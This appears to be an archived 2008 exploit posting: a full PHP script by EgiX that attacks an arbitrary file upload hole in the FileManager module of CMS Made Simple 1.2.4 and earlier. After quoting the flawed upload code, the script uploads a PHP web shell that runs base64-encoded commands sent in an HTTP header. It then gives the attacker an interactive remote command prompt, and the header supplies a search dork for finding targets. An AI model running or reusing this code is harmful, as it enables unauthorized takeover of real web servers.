cmsmadesimple-upload.txt
Posted on 13 May 2008
<?php /* --------------------------------------------------------------------------- CMS Made Simple <= 1.2.4 (FileManager module) Arbitrary File Upload Exploit --------------------------------------------------------------------------- author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://www.cmsmadesimple.org/ dork.....: "This site is powered by CMS Made Simple" [-] vulnerable code in /modules/FileManager/postlet/javaUpload.php 21. // Configuration --------------------------------------------------------------- 22. // Change the below path to the folder where you would like files uploading. 23. // e.g. "/home/yourname/myuploads/" 24. // or "c:phpuploads" 25. // Note, this MUST have the trailing slash. 26. $uploaddir = '[PATH TO UPLOAD DIRECTORY]'; 27. // Whether or not to allow the upload of specific files 28. $allow_or_deny = true; 29. // If the above is true, then this states whether the array of files is a list of 30. // extensions to ALLOW, or DENY 31. $allow_or_deny_method = "deny"; // "allow" or "deny" 32. $file_extension_list = array("php","asp","pl"); 33. // ----------------------------------------------------------------------------- 34. if ($allow_or_deny){ 35. if (($allow_or_deny_method == "allow" && !in_array(strtolower(array_pop(explode('.', $_FILES['userfile']['name']))), $file_extension_list)) 36. || ($allow_or_deny_method == "deny" && in_array(strtolower(array_pop(explode('.', $_FILES['userfile']['name']))), $file_extension_list))){ 37. // Atempt to upload a file with a specific extension when NOT allowed. 38. // 403 error 39. header("HTTP/1.1 403 Forbidden"); 40. echo "POSTLET REPLY "; 41. echo "POSTLET:NO "; 42. echo "POSTLET:FILE TYPE NOT ALLOWED "; 43. echo "POSTLET:ABORT THIS "; // Postlet should NOT send this file again. 44. echo "END POSTLET REPLY "; 45. exit; 46. } 47. } 48. if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .$_FILES['userfile']['name'])) 49. { 50. // All replies MUST start with "POSTLET REPLY", if they don't, then Postlet will 51. // not read the reply and will assume the file uploaded successfully. 52. echo "POSTLET REPLY "; 53. // "YES" tells Postlet that this file was successfully uploaded. 54. echo "POSTLET:YES "; 55. // End the Postlet reply 56. echo "END POSTLET REPLY "; 57. exit; with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code due to $file_extension_list array don't contains many dangerous extensions (.jsp, .php3, .cgi, .dhtml, etc...) */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print " [-] No response from {$host}:80 Trying again..."; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); return $resp; } function upload() { global $host, $path, $uploaddir, $file_ext; foreach ($file_ext as $ext) { print " [-] Trying to upload with .{$ext} extension..."; $data = "--12345 "; $data .= "Content-Disposition: form-data; name="userfile"; filename=".php.{$ext}" "; $data .= "Content-Type: application/octet-stream "; $data .= "<?php ${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${print(_code_)} ?> "; $data .= "--12345-- "; $packet = "POST {$path}modules/FileManager/postlet/javaUpload.php HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Content-Length: ".strlen($data)." "; $packet .= "Content-Type: multipart/form-data; boundary=12345 "; $packet .= "Connection: close "; $packet .= $data; $html = http_send($host, $packet); if (!eregi("POSTLET:YES", $html)) die(" [-] Upload failed! "); $packet = "GET {$path}modules/FileManager/postlet/{$uploaddir}.php.{$ext} HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Connection: close "; $html = http_send($host, $packet); if (!eregi("print", $html) and eregi("_code_", $html)) return $ext; sleep(1); } return false; } print " +----------------------------------------------------------------+"; print " | CMS Made Simple <= 1.2.4 Arbitrary File Upload Exploit by EgiX |"; print " +----------------------------------------------------------------+ "; if ($argc < 2) { print " Usage......: php $argv[0] host path"; print " Example....: php $argv[0] localhost /cms/ "; die(); } $host = $argv[1]; $path = $argv[2]; $uploaddir = rawurlencode("[PATH TO UPLOAD DIRECTORY]"); $file_ext = array("dhtml", "phtml", "php3", "php5", "jsp", "jar", "cgi"); if (!($ext = upload())) die(" [-] Exploit failed... "); else print " [-] Shell uploaded...starting it! "; define(STDIN, fopen("php://stdin", "r")); while(1) { print " cmsmadesimple-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $packet = "GET {$path}modules/FileManager/postlet/{$uploaddir}.php.{$ext} HTTP/1.0 "; $packet.= "Host: {$host} "; $packet.= "Cmd: ".base64_encode($cmd)." "; $packet.= "Connection: close "; $html = http_send($host, $packet); //echo $html; if (!eregi("_code_", $html)) die(" [-] Exploit failed... "); $shell = explode("_code_", $html); print " {$shell[1]}"; } else break; } ?>
